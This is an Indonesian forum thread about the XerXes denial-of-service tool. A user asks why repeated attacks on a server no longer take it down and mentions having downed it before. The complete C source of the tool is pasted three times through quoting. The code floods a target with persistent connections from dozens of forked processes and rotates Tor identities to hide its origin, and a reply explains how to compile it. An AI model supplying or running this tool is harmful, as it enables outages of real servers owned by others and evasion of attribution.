[Ask] xerxes stress testing
#1
ada yang pernah make xerxes dos, kalo dalam dos hasilnya voly sent itu kenapa ya,, apa server nya udah ga mempan dos Sad

[Image: Capture_zps3b666edc.png]

#2
Secara default xerxes bukan berasal dari kali linux .. moving to stress testing section

- Jika server target uji coba tidak down kemungkinan memang tidak vulnerability karena voly sent yg di maksud sama xerxes adalah paket telah terkirim (berarti paket malicious request jalan)

tolong beri link download tools biar bisa di analisa source codenya

title jgn cuma ask - edited
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
sory bang zee,, ow gitu ya, tapi kemaren pernah sampe down itu server, tapi setelah beberapa hari dicoba lagi udah kaya gitu (voly sent) berarti sudah ga vulnerability ya Undecided
ini source code nya, silahkan kalo mau di analisa, kalo ga salah sih bahasa C

Spoiler! :

/* XerXes - Most powerful dos tool */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror®);
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}


source http://pastebin.com/aWZMbjSU

#4
(04-27-2014, 10:21 AM)michaelhaikal Wrote: bang child cara save ama permission ya gmn ya.
q udh di chown +x xerxes kok gak bisa ya..

save aja extensi nya .c terus di compile lewat terminal

#5
(04-26-2014, 09:56 PM)child Wrote: sory bang zee,, ow gitu ya, tapi kemaren pernah sampe down itu server, tapi setelah beberapa hari dicoba lagi udah kaya gitu (voly sent) berarti sudah ga vulnerability ya Undecided
ini source code nya, silahkan kalo mau di analisa, kalo ga salah sih bahasa C

Spoiler! :

/* XerXes - Most powerful dos tool */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror®);
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}


source /aWZMbjSU

Kemungkinan besar sudah di patch ....
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#6
(04-28-2014, 12:57 AM)zee eichel Wrote:
(04-26-2014, 09:56 PM)child Wrote: sory bang zee,, ow gitu ya, tapi kemaren pernah sampe down itu server, tapi setelah beberapa hari dicoba lagi udah kaya gitu (voly sent) berarti sudah ga vulnerability ya Undecided
ini source code nya, silahkan kalo mau di analisa, kalo ga salah sih bahasa C

Spoiler! :

/* XerXes - Most powerful dos tool */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror®);
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}


source /aWZMbjSU

Kemungkinan besar sudah di patch ....

oke bro, makasih penjelasanya :-bd






Users browsing this thread: 1 Guest(s)